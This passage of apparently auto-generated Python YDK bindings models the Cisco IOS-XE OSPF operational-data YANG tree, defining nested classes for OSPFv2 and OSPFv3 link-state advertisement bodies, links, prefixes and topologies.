OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class LinkScopeLsas(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, self).__init__() self.yang_name = "link-scope-lsas" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.link_scope_lsa = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, ['lsa_type'], name, value) class LinkScopeLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, self).__init__() self.yang_name = "link-scope-lsa" self.yang_parent_name = "link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_id','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ('version', (YLeaf(YType.uint32, 'version'), ['int'])), ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])), ]) self.lsa_id = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.version = None self.router_address = None self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal() self.ospfv3_lsa_val.parent = self self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val" self.tlv = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv() self.tlv.parent = self self._children_name_map["tlv"] = "tlv" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv2_unknown_tlv = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix_list = YList(self) self.ospfv3_ia_prefix = YList(self) self.multi_topology = YList(self) self.unknown_sub_tlv = YList(self) self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value) class Ospfv2Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, 